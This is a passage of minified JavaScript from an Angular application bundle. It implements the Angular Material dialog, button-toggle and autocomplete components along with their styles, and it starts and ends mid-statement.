rA{constructor(){this.role="dialog",this.panelClass="",this.hasBackdrop=!0,this.backdropClass="",this.disableClose=!1,this.width="",this.height="",this.maxWidth="80vw",this.data=null,this.ariaDescribedBy=null,this.ariaLabelledBy=null,this.ariaLabel=null,this.ariaModal=!0,this.autoFocus="first-tabbable",this.restoreFocus=!0,this.delayFocusTrap=!0,this.closeOnNavigation=!0,this.enterAnimationDuration=B1.params.enterAnimationDuration,this.exitAnimationDuration=B1.params.exitAnimationDuration}}let o2e=(()=>{class t extends lV{constructor(e,i,n,r,c,d,T,k){super(e,i,n,r,c,d,T,k),this._animationStateChanged=new Tt}_captureInitialFocus(){this._config.delayFocusTrap||this._trapFocus()}_openAnimationDone(e){this._config.delayFocusTrap&&this._trapFocus(),this._animationStateChanged.next({state:"opened",totalTime:e})}}return t.\u0275fac=function(e){return new(e||t)(Ee(mi),Ee(z3),Ee(ga,8),Ee(rA),Ee(Ky),Ee(qi),Ee(nb),Ee(js))},t.\u0275cmp=Wt({type:t,selectors:[["ng-component"]],features:[ci],decls:0,vars:0,template:function(e,i){},encapsulation:2}),t})(),r2e=(()=>{class t extends o2e{constructor(e,i,n,r,c,d,T,k,q){super(e,i,n,r,c,d,T,q),this._changeDetectorRef=k,this._state="enter"}_onAnimationDone({toState:e,totalTime:i}){"enter"===e?this._openAnimationDone(i):"exit"===e&&this._animationStateChanged.next({state:"closed",totalTime:i})}_onAnimationStart({toState:e,totalTime:i}){"enter"===e?this._animationStateChanged.next({state:"opening",totalTime:i}):("exit"===e||"void"===e)&&this._animationStateChanged.next({state:"closing",totalTime:i})}_startExitAnimation(){this._state="exit",this._changeDetectorRef.markForCheck()}_getAnimationState(){return{value:this._state,params:{enterAnimationDuration:this._config.enterAnimationDuration||B1.params.enterAnimationDuration,exitAnimationDuration:this._config.exitAnimationDuration||B1.params.exitAnimationDuration}}}}return t.\u0275fac=function(e){return new(e||t)(Ee(mi),Ee(z3),Ee(ga,8),Ee(rA),Ee(Ky),Ee(qi),Ee(nb),Ee(Ma),Ee(js))},t.\u0275cmp=Wt({type:t,selectors:[["mat-dialog-container"]],hostAttrs:["tabindex","-1",1,"mat-dialog-container"],hostVars:7,hostBindings:function(e,i){1&e&&GC("@dialogContainer.start",function(r){return i._onAnimationStart(r)})("@dialogContainer.done",function(r){return i._onAnimationDone(r)}),2&e&&(Gs("id",i._config.id),Rt("aria-modal",i._config.ariaModal)("role",i._config.role)("aria-labelledby",i._config.ariaLabel?null:i._ariaLabelledBy)("aria-label",i._config.ariaLabel)("aria-describedby",i._config.ariaDescribedBy||null),s1("@dialogContainer",i._getAnimationState()))},features:[ci],decls:1,vars:0,consts:[["cdkPortalOutlet",""]],template:function(e,i){1&e&&ne(0,a2e,0,0,"ng-template",0)},dependencies:[Cu],styles:[".mat-dialog-container{display:block;padding:24px;border-radius:4px;box-sizing:border-box;overflow:auto;outline:0;width:100%;height:100%;min-height:inherit;max-height:inherit}.cdk-high-contrast-active .mat-dialog-container{outline:solid 1px}.mat-dialog-content{display:block;margin:0 -24px;padding:0 24px;max-height:65vh;overflow:auto;-webkit-overflow-scrolling:touch}.mat-dialog-title{margin:0 0 20px;display:block}.mat-dialog-actions{padding:8px 0;display:flex;flex-wrap:wrap;min-height:52px;align-items:center;box-sizing:content-box;margin-bottom:-24px}.mat-dialog-actions.mat-dialog-actions-align-center,.mat-dialog-actions[align=center]{justify-content:center}.mat-dialog-actions.mat-dialog-actions-align-end,.mat-dialog-actions[align=end]{justify-content:flex-end}.mat-dialog-actions .mat-button-base+.mat-button-base,.mat-dialog-actions .mat-mdc-button-base+.mat-mdc-button-base{margin-left:8px}[dir=rtl] .mat-dialog-actions .mat-button-base+.mat-button-base,[dir=rtl] .mat-dialog-actions .mat-mdc-button-base+.mat-mdc-button-base{margin-left:0;margin-right:8px}"],encapsulation:2,data:{animation:[n2e.dialogContainer]}}),t})();class Gh{constructor(a,e,i){this._ref=a,this._containerInstance=i,this._afterOpened=new J,this._beforeClosed=new J,this._state=0,this.disableClose=e.disableClose,this.id=a.id,i._animationStateChanged.pipe(Dn(n=>"opened"===n.state),Cn(1)).subscribe(()=>{this._afterOpened.next(),this._afterOpened.complete()}),i._animationStateChanged.pipe(Dn(n=>"closed"===n.state),Cn(1)).subscribe(()=>{clearTimeout(this._closeFallbackTimeout),this._finishDialogClose()}),a.overlayRef.detachments().subscribe(()=>{this._beforeClosed.next(this._result),this._beforeClosed.complete(),this._finishDialogClose()}),ra(this.backdropClick(),this.keydownEvents().pipe(Dn(n=>27===n.keyCode&&!this.disableClose&&!es(n)))).subscribe(n=>{this.disableClose||(n.preventDefault(),uV(this,"keydown"===n.type?"keyboard":"mouse"))})}close(a){this._result=a,this._containerInstance._animationStateChanged.pipe(Dn(e=>"closing"===e.state),Cn(1)).subscribe(e=>{this._beforeClosed.next(a),this._beforeClosed.complete(),this._ref.overlayRef.detachBackdrop(),this._closeFallbackTimeout=setTimeout(()=>this._finishDialogClose(),e.totalTime+100)}),this._state=1,this._containerInstance._startExitAnimation()}afterOpened(){return this._afterOpened}afterClosed(){return this._ref.closed}beforeClosed(){return this._beforeClosed}backdropClick(){return this._ref.backdropClick}keydownEvents(){return this._ref.keydownEvents}updatePosition(a){let e=this._ref.config.positionStrategy;return a&&(a.left||a.right)?a.left?e.left(a.left):e.right(a.right):e.centerHorizontally(),a&&(a.top||a.bottom)?a.top?e.top(a.top):e.bottom(a.bottom):e.centerVertically(),this._ref.updatePosition(),this}updateSize(a="",e=""){return this._ref.updateSize(a,e),this}addPanelClass(a){return this._ref.addPanelClass(a),this}removePanelClass(a){return this._ref.removePanelClass(a),this}getState(){return this._state}_finishDialogClose(){this._state=2,this._ref.close(this._result,{focusOrigin:this._closeInteractionType}),this.componentInstance=null}}function uV(t,a,e){return t._closeInteractionType=a,t.close(e)}const _p=new ni("MatDialogData"),s2e=new ni("mat-dialog-default-options"),hV=new ni("mat-dialog-scroll-strategy"),l2e={provide:hV,deps:[As],useFactory:function c2e(t){return()=>t.scrollStrategies.block()}};let d2e=0,m2e=(()=>{class t{constructor(e,i,n,r,c,d,T,k,q,Y){this._overlay=e,this._defaultOptions=n,this._parentDialog=r,this._dialogRefConstructor=T,this._dialogContainerType=k,this._dialogDataToken=q,this._openDialogsAtThisLevel=[],this._afterAllClosedAtThisLevel=new J,this._afterOpenedAtThisLevel=new J,this._idPrefix="mat-dialog-",this.afterAllClosed=rp(()=>this.openDialogs.length?this._getAfterAllClosed():this._getAfterAllClosed().pipe(Ro(void 0))),this._scrollStrategy=d,this._dialog=i.get(mV)}get openDialogs(){return this._parentDialog?this._parentDialog.openDialogs:this._openDialogsAtThisLevel}get afterOpened(){return this._parentDialog?this._parentDialog.afterOpened:this._afterOpenedAtThisLevel}_getAfterAllClosed(){const e=this._parentDialog;return e?e._getAfterAllClosed():this._afterAllClosedAtThisLevel}open(e,i){let n;(i=Object.assign(Object.assign({},this._defaultOptions||new rA),i)).id=i.id||`${this._idPrefix}${d2e++}`,i.scrollStrategy=i.scrollStrategy||this._scrollStrategy();const r=this._dialog.open(e,Object.assign(Object.assign({},i),{positionStrategy:this._overlay.position().global().centerHorizontally().centerVertically(),disableClose:!0,closeOnDestroy:!1,container:{type:this._dialogContainerType,providers:()=>[{provide:rA,useValue:i},{provide:oA,useValue:i}]},templateContext:()=>({dialogRef:n}),providers:(c,d,T)=>(n=new this._dialogRefConstructor(c,i,T),n.updatePosition(null==i?void 0:i.position),[{provide:this._dialogContainerType,useValue:T},{provide:this._dialogDataToken,useValue:d.data},{provide:this._dialogRefConstructor,useValue:n}])}));return n.componentInstance=r.componentInstance,this.openDialogs.push(n),this.afterOpened.next(n),n.afterClosed().subscribe(()=>{const c=this.openDialogs.indexOf(n);c>-1&&(this.openDialogs.splice(c,1),this.openDialogs.length||this._getAfterAllClosed().next())}),n}closeAll(){this._closeDialogs(this.openDialogs)}getDialogById(e){return this.openDialogs.find(i=>i.id===e)}ngOnDestroy(){this._closeDialogs(this._openDialogsAtThisLevel),this._afterAllClosedAtThisLevel.complete(),this._afterOpenedAtThisLevel.complete()}_closeDialogs(e){let i=e.length;for(;i--;)e[i].close()}}return t.\u0275fac=function(e){_d()},t.\u0275prov=hi({token:t,factory:t.\u0275fac}),t})(),vu=(()=>{class t extends m2e{constructor(e,i,n,r,c,d,T,k){super(e,i,r,d,T,c,Gh,r2e,_p,k)}}return t.\u0275fac=function(e){return new(e||t)(At(As),At(Ko),At(iy,8),At(s2e,8),At(hV),At(t,12),At(ob),At(ar,8))},t.\u0275prov=hi({token:t,factory:t.\u0275fac}),t})(),u2e=0,vm=(()=>{class t{constructor(e,i,n){this.dialogRef=e,this._elementRef=i,this._dialog=n,this.type="button"}ngOnInit(){this.dialogRef||(this.dialogRef=fV(this._elementRef,this._dialog.openDialogs))}ngOnChanges(e){const i=e._matDialogClose||e._matDialogCloseResult;i&&(this.dialogResult=i.currentValue)}_onButtonClick(e){uV(this.dialogRef,0===e.screenX&&0===e.screenY?"keyboard":"mouse",this.dialogResult)}}return t.\u0275fac=function(e){return new(e||t)(Ee(Gh,8),Ee(mi),Ee(vu))},t.\u0275dir=Ot({type:t,selectors:[["","mat-dialog-close",""],["","matDialogClose",""]],hostVars:2,hostBindings:function(e,i){1&e&&he("click",function(r){return i._onButtonClick(r)}),2&e&&Rt("aria-label",i.ariaLabel||null)("type",i.type)},inputs:{ariaLabel:["aria-label","ariaLabel"],type:"type",dialogResult:["mat-dialog-close","dialogResult"],_matDialogClose:["matDialogClose","_matDialogClose"]},exportAs:["matDialogClose"],features:[sa]}),t})(),Am=(()=>{class t{constructor(e,i,n){this._dialogRef=e,this._elementRef=i,this._dialog=n,this.id="mat-dialog-title-"+u2e++}ngOnInit(){this._dialogRef||(this._dialogRef=fV(this._elementRef,this._dialog.openDialogs)),this._dialogRef&&Promise.resolve().then(()=>{const e=this._dialogRef._containerInstance;e&&!e._ariaLabelledBy&&(e._ariaLabelledBy=this.id)})}}return t.\u0275fac=function(e){return new(e||t)(Ee(Gh,8),Ee(mi),Ee(vu))},t.\u0275dir=Ot({type:t,selectors:[["","mat-dialog-title",""],["","matDialogTitle",""]],hostAttrs:[1,"mat-dialog-title"],hostVars:1,hostBindings:function(e,i){2&e&&Gs("id",i.id)},inputs:{id:"id"},exportAs:["matDialogTitle"]}),t})(),Tm=(()=>{class t{}return t.\u0275fac=function(e){return new(e||t)},t.\u0275dir=Ot({type:t,selectors:[["","mat-dialog-content",""],["mat-dialog-content"],["","matDialogContent",""]],hostAttrs:[1,"mat-dialog-content"]}),t})(),Em=(()=>{class t{constructor(){this.align="start"}}return t.\u0275fac=function(e){return new(e||t)},t.\u0275dir=Ot({type:t,selectors:[["","mat-dialog-actions",""],["mat-dialog-actions"],["","matDialogActions",""]],hostAttrs:[1,"mat-dialog-actions"],hostVars:4,hostBindings:function(e,i){2&e&&Ct("mat-dialog-actions-align-center","center"===i.align)("mat-dialog-actions-align-end","end"===i.align)},inputs:{align:"align"}}),t})();function fV(t,a){let e=t.nativeElement.parentElement;for(;e&&!e.classList.contains("mat-dialog-container");)e=e.parentElement;return e?a.find(i=>i.id===e.id):null}let y8=(()=>{class t{}return t.\u0275fac=function(e){return new(e||t)},t.\u0275mod=yi({type:t}),t.\u0275inj=Ci({providers:[vu,l2e],imports:[i2e,bu,yu,la,la]}),t})();const h2e=["button"],f2e=["*"],pV=new ni("MAT_BUTTON_TOGGLE_DEFAULT_OPTIONS"),_V=new ni("MatButtonToggleGroup"),p2e={provide:Ls,useExisting:ja(()=>b8),multi:!0};let gV=0;class CV{constructor(a,e){this.source=a,this.value=e}}let b8=(()=>{class t{constructor(e,i){this._changeDetector=e,this._vertical=!1,this._multiple=!1,this._disabled=!1,this._controlValueAccessorChangeFn=()=>{},this._onTouched=()=>{},this._name="mat-button-toggle-group-"+gV++,this.valueChange=new Tt,this.change=new Tt,this.appearance=i&&i.appearance?i.appearance:"standard"}get name(){return this._name}set name(e){this._name=e,this._markButtonsForCheck()}get vertical(){return this._vertical}set vertical(e){this._vertical=wi(e)}get value(){const e=this._selectionModel?this._selectionModel.selected:[];return this.multiple?e.map(i=>i.value):e[0]?e[0].value:void 0}set value(e){this._setSelectionByValue(e),this.valueChange.emit(this.value)}get selected(){const e=this._selectionModel?this._selectionModel.selected:[];return this.multiple?e:e[0]||null}get multiple(){return this._multiple}set multiple(e){this._multiple=wi(e),this._markButtonsForCheck()}get disabled(){return this._disabled}set disabled(e){this._disabled=wi(e),this._markButtonsForCheck()}ngOnInit(){this._selectionModel=new I1(this.multiple,void 0,!1)}ngAfterContentInit(){this._selectionModel.select(...this._buttonToggles.filter(e=>e.checked))}writeValue(e){this.value=e,this._changeDetector.markForCheck()}registerOnChange(e){this._controlValueAccessorChangeFn=e}registerOnTouched(e){this._onTouched=e}setDisabledState(e){this.disabled=e}_emitChangeEvent(e){const i=new CV(e,this.value);this._controlValueAccessorChangeFn(i.value),this.change.emit(i)}_syncButtonToggle(e,i,n=!1,r=!1){!this.multiple&&this.selected&&!e.checked&&(this.selected.checked=!1),this._selectionModel?i?this._selectionModel.select(e):this._selectionModel.deselect(e):r=!0,r?Promise.resolve().then(()=>this._updateModelValue(e,n)):this._updateModelValue(e,n)}_isSelected(e){return this._selectionModel&&this._selectionModel.isSelected(e)}_isPrechecked(e){return void 0!==this._rawValue&&(this.multiple&&Array.isArray(this._rawValue)?this._rawValue.some(i=>null!=e.value&&i===e.value):e.value===this._rawValue)}_setSelectionByValue(e){this._rawValue=e,this._buttonToggles&&(this.multiple&&e?(Array.isArray(e),this._clearSelection(),e.forEach(i=>this._selectValue(i))):(this._clearSelection(),this._selectValue(e)))}_clearSelection(){this._selectionModel.clear(),this._buttonToggles.forEach(e=>e.checked=!1)}_selectValue(e){const i=this._buttonToggles.find(n=>null!=n.value&&n.value===e);i&&(i.checked=!0,this._selectionModel.select(i))}_updateModelValue(e,i){i&&this._emitChangeEvent(e),this.valueChange.emit(this.value)}_markButtonsForCheck(){var e;null===(e=this._buttonToggles)||void 0===e||e.forEach(i=>i._markForCheck())}}return t.\u0275fac=function(e){return new(e||t)(Ee(Ma),Ee(pV,8))},t.\u0275dir=Ot({type:t,selectors:[["mat-button-toggle-group"]],contentQueries:function(e,i,n){if(1&e&&fa(n,M8,5),2&e){let r;Vt(r=Bt())&&(i._buttonToggles=r)}},hostAttrs:["role","group",1,"mat-button-toggle-group"],hostVars:5,hostBindings:function(e,i){2&e&&(Rt("aria-disabled",i.disabled),Ct("mat-button-toggle-vertical",i.vertical)("mat-button-toggle-group-appearance-standard","standard"===i.appearance))},inputs:{appearance:"appearance",name:"name",vertical:"vertical",value:"value",multiple:"multiple",disabled:"disabled"},outputs:{valueChange:"valueChange",change:"change"},exportAs:["matButtonToggleGroup"],features:[ki([p2e,{provide:_V,useExisting:t}])]}),t})();const _2e=El(class{});let M8=(()=>{class t extends _2e{constructor(e,i,n,r,c,d){super(),this._changeDetectorRef=i,this._elementRef=n,this._focusMonitor=r,this._checked=!1,this.ariaLabelledby=null,this._disabled=!1,this.change=new Tt;const T=Number(c);this.tabIndex=T||0===T?T:null,this.buttonToggleGroup=e,this.appearance=d&&d.appearance?d.appearance:"standard"}get buttonId(){return`${this.id}-button`}get appearance(){return this.buttonToggleGroup?this.buttonToggleGroup.appearance:this._appearance}set appearance(e){this._appearance=e}get checked(){return this.buttonToggleGroup?this.buttonToggleGroup._isSelected(this):this._checked}set checked(e){const i=wi(e);i!==this._checked&&(this._checked=i,this.buttonToggleGroup&&this.buttonToggleGroup._syncButtonToggle(this,this._checked),this._changeDetectorRef.markForCheck())}get disabled(){return this._disabled||this.buttonToggleGroup&&this.buttonToggleGroup.disabled}set disabled(e){this._disabled=wi(e)}ngOnInit(){const e=this.buttonToggleGroup;this.id=this.id||"mat-button-toggle-"+gV++,e&&(e._isPrechecked(this)?this.checked=!0:e._isSelected(this)!==this._checked&&e._syncButtonToggle(this,this._checked))}ngAfterViewInit(){this._focusMonitor.monitor(this._elementRef,!0)}ngOnDestroy(){const e=this.buttonToggleGroup;this._focusMonitor.stopMonitoring(this._elementRef),e&&e._isSelected(this)&&e._syncButtonToggle(this,!1,!1,!0)}focus(e){this._buttonElement.nativeElement.focus(e)}_onButtonClick(){const e=!!this._isSingleSelector()||!this._checked;e!==this._checked&&(this._checked=e,this.buttonToggleGroup&&(this.buttonToggleGroup._syncButtonToggle(this,this._checked,!0),this.buttonToggleGroup._onTouched())),this.change.emit(new CV(this,this.value))}_markForCheck(){this._changeDetectorRef.markForCheck()}_getButtonName(){return this._isSingleSelector()?this.buttonToggleGroup.name:this.name||null}_isSingleSelector(){return this.buttonToggleGroup&&!this.buttonToggleGroup.multiple}}return t.\u0275fac=function(e){return new(e||t)(Ee(_V,8),Ee(Ma),Ee(mi),Ee(js),Vr("tabindex"),Ee(pV,8))},t.\u0275cmp=Wt({type:t,selectors:[["mat-button-toggle"]],viewQuery:function(e,i){if(1&e&&Mi(h2e,5),2&e){let n;Vt(n=Bt())&&(i._buttonElement=n.first)}},hostAttrs:["role","presentation",1,"mat-button-toggle"],hostVars:12,hostBindings:function(e,i){1&e&&he("focus",function(){return i.focus()}),2&e&&(Rt("aria-label",null)("aria-labelledby",null)("id",i.id)("name",null),Ct("mat-button-toggle-standalone",!i.buttonToggleGroup)("mat-button-toggle-checked",i.checked)("mat-button-toggle-disabled",i.disabled)("mat-button-toggle-appearance-standard","standard"===i.appearance))},inputs:{disableRipple:"disableRipple",ariaLabel:["aria-label","ariaLabel"],ariaLabelledby:["aria-labelledby","ariaLabelledby"],id:"id",name:"name",value:"value",tabIndex:"tabIndex",appearance:"appearance",checked:"checked",disabled:"disabled"},outputs:{change:"change"},exportAs:["matButtonToggle"],features:[ci],ngContentSelectors:f2e,decls:6,vars:9,consts:[["type","button",1,"mat-button-toggle-button","mat-focus-indicator",3,"id","disabled","click"],["button",""],[1,"mat-button-toggle-label-content"],[1,"mat-button-toggle-focus-overlay"],["matRipple","",1,"mat-button-toggle-ripple",3,"matRippleTrigger","matRippleDisabled"]],template:function(e,i){if(1&e&&(Jn(),m(0,"button",0,1),he("click",function(){return i._onButtonClick()}),m(2,"span",2),va(3),u()(),it(4,"span",3)(5,"span",4)),2&e){const n=Ti(1);F("id",i.buttonId)("disabled",i.disabled||null),Rt("tabindex",i.disabled?-1:i.tabIndex)("aria-pressed",i.checked)("name",i._getButtonName())("aria-label",i.ariaLabel)("aria-labelledby",i.ariaLabelledby),g(5),F("matRippleTrigger",n)("matRippleDisabled",i.disableRipple||i.disabled)}},dependencies:[Dl],styles:[".mat-button-toggle-standalone,.mat-button-toggle-group{position:relative;display:inline-flex;flex-direction:row;white-space:nowrap;overflow:hidden;border-radius:2px;-webkit-tap-highlight-color:rgba(0,0,0,0);transform:translateZ(0)}.cdk-high-contrast-active .mat-button-toggle-standalone,.cdk-high-contrast-active .mat-button-toggle-group{outline:solid 1px}.mat-button-toggle-standalone.mat-button-toggle-appearance-standard,.mat-button-toggle-group-appearance-standard{border-radius:4px}.cdk-high-contrast-active .mat-button-toggle-standalone.mat-button-toggle-appearance-standard,.cdk-high-contrast-active .mat-button-toggle-group-appearance-standard{outline:0}.mat-button-toggle-vertical{flex-direction:column}.mat-button-toggle-vertical .mat-button-toggle-label-content{display:block}.mat-button-toggle{white-space:nowrap;position:relative}.mat-button-toggle .mat-icon svg{vertical-align:top}.mat-button-toggle.cdk-keyboard-focused .mat-button-toggle-focus-overlay{opacity:1}.mat-button-toggle-appearance-standard:not(.mat-button-toggle-disabled):hover .mat-button-toggle-focus-overlay{opacity:.04}.mat-button-toggle-appearance-standard.cdk-keyboard-focused:not(.mat-button-toggle-disabled) .mat-button-toggle-focus-overlay{opacity:.12}@media(hover: none){.mat-button-toggle-appearance-standard:not(.mat-button-toggle-disabled):hover .mat-button-toggle-focus-overlay{display:none}}.mat-button-toggle-label-content{-webkit-user-select:none;user-select:none;display:inline-block;line-height:36px;padding:0 16px;position:relative}.mat-button-toggle-appearance-standard .mat-button-toggle-label-content{padding:0 12px}.mat-button-toggle-label-content>*{vertical-align:middle}.mat-button-toggle-focus-overlay{top:0;left:0;right:0;bottom:0;position:absolute;border-radius:inherit;pointer-events:none;opacity:0}.cdk-high-contrast-active .mat-button-toggle-checked .mat-button-toggle-focus-overlay{border-bottom:solid 36px;opacity:.5;height:0}.cdk-high-contrast-active .mat-button-toggle-checked:hover .mat-button-toggle-focus-overlay{opacity:.6}.cdk-high-contrast-active .mat-button-toggle-checked.mat-button-toggle-appearance-standard .mat-button-toggle-focus-overlay{border-bottom:solid 500px}.mat-button-toggle .mat-button-toggle-ripple{top:0;left:0;right:0;bottom:0;position:absolute;pointer-events:none}.mat-button-toggle-button{border:0;background:none;color:inherit;padding:0;margin:0;font:inherit;outline:none;width:100%;cursor:pointer}.mat-button-toggle-disabled .mat-button-toggle-button{cursor:default}.mat-button-toggle-button::-moz-focus-inner{border:0}"],encapsulation:2,changeDetection:0}),t})(),yV=(()=>{class t{}return t.\u0275fac=function(e){return new(e||t)},t.\u0275mod=yi({type:t}),t.\u0275inj=Ci({imports:[la,Od,la]}),t})();const g2e=["panel"];function C2e(t,a){if(1&t&&(m(0,"div",0,1),va(2),u()),2&t){const e=a.id,i=V();F("id",i.id)("ngClass",i._classList),Rt("aria-label",i.ariaLabel||null)("aria-labelledby",i._getPanelAriaLabelledby(e))}}const y2e=["*"];let b2e=0;class M2e{constructor(a,e){this.source=a,this.option=e}}const v2e=El(class{}),bV=new ni("mat-autocomplete-default-options",{providedIn:"root",factory:function A2e(){return{autoActiveFirstOption:!1,autoSelectActiveOption:!1}}});let T2e=(()=>{class t extends v2e{constructor(e,i,n,r){super(),this._changeDetectorRef=e,this._elementRef=i,this._activeOptionChanges=I.EMPTY,this.showPanel=!1,this._isOpen=!1,this.displayWith=null,this.optionSelected=new Tt,this.opened=new Tt,this.closed=new Tt,this.optionActivated=new Tt,this._classList={},this.id="mat-autocomplete-"+b2e++,this.inertGroups=(null==r?void 0:r.SAFARI)||!1,this._autoActiveFirstOption=!!n.autoActiveFirstOption,this._autoSelectActiveOption=!!n.autoSelectActiveOption}get isOpen(){return this._isOpen&&this.showPanel}get autoActiveFirstOption(){return this._autoActiveFirstOption}set autoActiveFirstOption(e){this._autoActiveFirstOption=wi(e)}get autoSelectActiveOption(){return this._autoSelectActiveOption}set autoSelectActiveOption(e){this._autoSelectActiveOption=wi(e)}set classList(e){this._classList=e&&e.length?function Nhe(t,a=/\s+/){const e=[];if(null!=t){const i=Array.isArray(t)?t:`${t}`.split(a);for(const n of i){const r=`${n}`.trim();r&&e.push(r)}}return e}(e).reduce((i,n)=>(i[n]=!0,i),{}):{},this._setVisibilityClasses(this._classList),this._elementRef.nativeElement.className=""}ngAfterContentInit(){this._keyManager=new Bz(this.options).withWrap(),this._activeOptionChanges=this._keyManager.change.subscribe(e=>{this.isOpen&&this.optionActivated.emit({source:this,option:this.options.toArray()[e]||null})}),this._setVisibility()}ngOnDestroy(){this._activeOptionChanges.unsubscribe()}_setScrollTop(e){this.panel&&(this.panel.nativeElement.scrollTop=e)}_getScrollTop(){return this.panel?this.panel.nativeElement.scrollTop:0}_setVisibility(){this.showPanel=!!this.options.length,this._setVisibilityClasses(this._classList),this._changeDetectorRef.markForCheck()}_emitSelectEvent(e){const i=new M2e(this,e);this.optionSelected.emit(i)}_getPanelAriaLabelledby(e){return this.ariaLabel?null:this.ariaLabelledby?(e?e+" ":"")+this.ariaLabelledby:e}_setVisibilityClasses(e){e[this._visibleClass]=this.showPanel,e[this._hiddenClass]=!this.showPanel}}return t.\u0275fac=function(e){return new(e||t)(Ee(Ma),Ee(mi),Ee(bV),Ee(cr))},t.\u0275dir=Ot({type:t,viewQuery:function(e,i){if(1&e&&(Mi(ho,7),Mi(g2e,5)),2&e){let n;Vt(n=Bt())&&(i.template=n.first),Vt(n=Bt())&&(i.panel=n.first)}},inputs:{ariaLabel:["aria-label","ariaLabel"],ariaLabelledby:["aria-labelledby","ariaLabelledby"],displayWith:"displayWith",autoActiveFirstOption:"autoActiveFirstOption",autoSelectActiveOption:"autoSelectActiveOption",panelWidth:"panelWidth",classList:["class","classList"]},outputs:{optionSelected:"optionSelected",opened:"opened",closed:"closed",optionActivated:"optionActivated"},features:[ci]}),t})(),E2e=(()=>{class t extends T2e{constructor(){super(...arguments),this._visibleClass="mat-autocomplete-visible",this._hiddenClass="mat-autocomplete-hidden"}}return t.\u0275fac=function(){let a;return function(i){return(a||(a=ba(t)))(i||t)}}(),t.\u0275cmp=Wt({type:t,selectors:[["mat-autocomplete"]],contentQueries:function(e,i,n){if(1&e&&(fa(n,j3,5),fa(n,yr,5)),2&e){let r;Vt(r=Bt())&&(i.optionGroups=r),Vt(r=Bt())&&(i.options=r)}},hostAttrs:[1,"mat-autocomplete"],inputs:{disableRipple:"disableRipple"},exportAs:["matAutocomplete"],features:[ki([{provide:G3,useExisting:t}]),ci],ngContentSelectors:y2e,decls:1,vars:0,consts:[["role","listbox",1,"mat-autocomplete-panel",3,"id","ngClass"],["panel",""]],template:function(e,i){1&e&&(Jn(),ne(0,C2e,3,4,"ng-template"))},dependencies:[ig],styles:[".mat-autocomplete-panel{min-width:112px;max-width:280px;overflow:auto;-webkit-overflow-scrolling:touch;visibility:hidden;max-width:none;max-height:256px;position:relative;width:100%;border-bottom-left-radius:4px;border-bottom-right-radius:4px}.mat-autocomplete-panel.mat-autocomplete-visible{visibility:visible}.mat-autocomplete-panel.mat-autocomplete-hidden{visibility:hidden}.mat-autocomplete-panel-above .mat-autocomplete-panel{border-radius:0;border-top-left-radius:4px;border-top-right-radius:4px}.mat-autocomplete-panel .mat-divider-horizontal{margin-top:-1px}.cdk-high-contrast-active .mat-autocomplete-panel{outline:solid 1px}mat-autocomplete{display:none}"],encapsulation:2,changeDetection:0}),t})();const MV=new ni("mat-autocomplete-scroll-strategy"),x2e={provide:MV,deps:[As],useFactory:function D2e(t){return()=>t.scrollStrategies.reposition()}},w2e={provide:Ls,useExisting:ja(()=>vV),multi:!0};let I2e=(()=>{class t{constructor(e,i,n,r,c,d,T,k,q,Y,te){this._element=e,this._overlay=i,this._viewContainerRef=n,this._zone=r,this._changeDetectorRef=c,this._dir=T,this._formField=k,this._document=q,this._viewportRuler=Y,this._defaults=te,this._componentDestroyed=!1,this._autocompleteDisabled=!1,this._manuallyFloatingLabel=!1,this._viewportSubscription=I.EMPTY,this._canOpenOnNextFocus=!0,this._closeKeyEventStream=new J,this._windowBlurHandler=()=>{this._canOpenOnNextFocus=this._document.activeElement!==this._element.nativeElement||this.panelOpen},this._onChange=()=>{},this._onTouched=()=>{},this.position="auto",this.autocompleteAttribute="off",this._overlayAttached=!1,this.optionSelections=rp(()=>{const pe=this.autocomplete?this.autocomplete.options:null;return pe?pe.changes.pipe(Ro(pe),Ur(()=>ra(...pe.map(Re=>Re.onSelectionChange)))):this._zone.onStable.pipe(Cn(1),Ur(()=>this.optionSelections))}),this._scrollStrategy=d}get autocompleteDisabled(){return this._autocompleteDisabled}set autocompleteDisabled(e){this._autocompleteDisabled=wi(e)}ngAfterViewInit(){const e=this._getWindow();void 0!==e&&this._zone.runOutsideAngular(()=>e.addEventListener("blur",this._windowBlurHandler))}ngOnChanges(e){e.position&&this._positionStrategy&&(this._setStrategyPositions(this._positionStrategy),this.panelOpen&&this._overlayRef.updatePosition())}ngOnDestroy(){const e=this._getWindow();void 0!==e&&e.removeEventListener("blur",this._windowBlurHandler),this._viewportSubscription.unsubscribe(),this._componentDestroyed=!0,this._destroyPanel(),this._closeKeyEventStream.complete()}get panelOpen(){return this._overlayAttached&&this.autocomplete.showPanel}openPanel(){this._attachOverlay(),this._floatLabel()}closePanel(){this._resetLabel(),this._overlayAttached&&(this.panelOpen&&this._zone.run(()=>{this.autocomplete.closed.emit()}),this.autocomplete._isOpen=this._overlayAttached=!1,this._pendingAutoselectedOption=null,this._overlayRef&&this._overlayRef.hasAttached()&&(this._overlayRef.detach(),this._closingActionsSubscription.unsubscribe()),this._componentDestroyed||this._changeDetectorRef.detectChanges())}updatePosition(){this._overlayAttached&&this._overlayRef.updatePosition()}get panelClosingActions(){return ra(this.optionSelections,this.autocomplete._keyManager.tabOut.pipe(Dn(()=>this._overlayAttached)),this._closeKeyEventStream,this._getOutsideClickStream(),this._overlayRef?this._overlayRef.detachments().pipe(Dn(()=>this._overlayAttached)):Bi()).pipe(Xe(e=>e instanceof IW?e:null))}get activeOption(){return this.autocomplete&&this.autocomplete._keyManager?this.autocomplete._keyManager.activeItem:null}_getOutsideClickStream(){return ra(Tc(this._document,"click"),Tc(this._document,"auxclick"),Tc(this._document,"touchend")).pipe(Dn(e=>{const i=Id(e),n=this._formField?this._formField._elementRef.nativeElement:null,r=this.connectedTo?this.connectedTo.elementRef.nativeElement:null;return this._overlayAttached&&i!==this._element.nativeElement&&this._document.activeElement!==this._element.nativeElement&&(!n||!n.contains(i))&&(!r||!r.contains(i))&&!!this._overlayRef&&!this._overlayRef.overlayElement.contains(i)}))}writeValue(e){Promise.resolve(null).then(()=>this._assignOptionValue(e))}registerOnChange(e){this._onChange=e}registerOnTouched(e){this._onTouched=e}setDisabledState(e){this._element.nativeElement.disabled=e}_handleKeydown(e){const i=e.keyCode,n=es(e);if(27===i&&!n&&e.preventDefault(),this.activeOption&&13===i&&this.panelOpen&&!n)this.activeOption._selectViaInteraction(),this._resetActiveItem(),e.preventDefault();else if(this.autocomplete){const 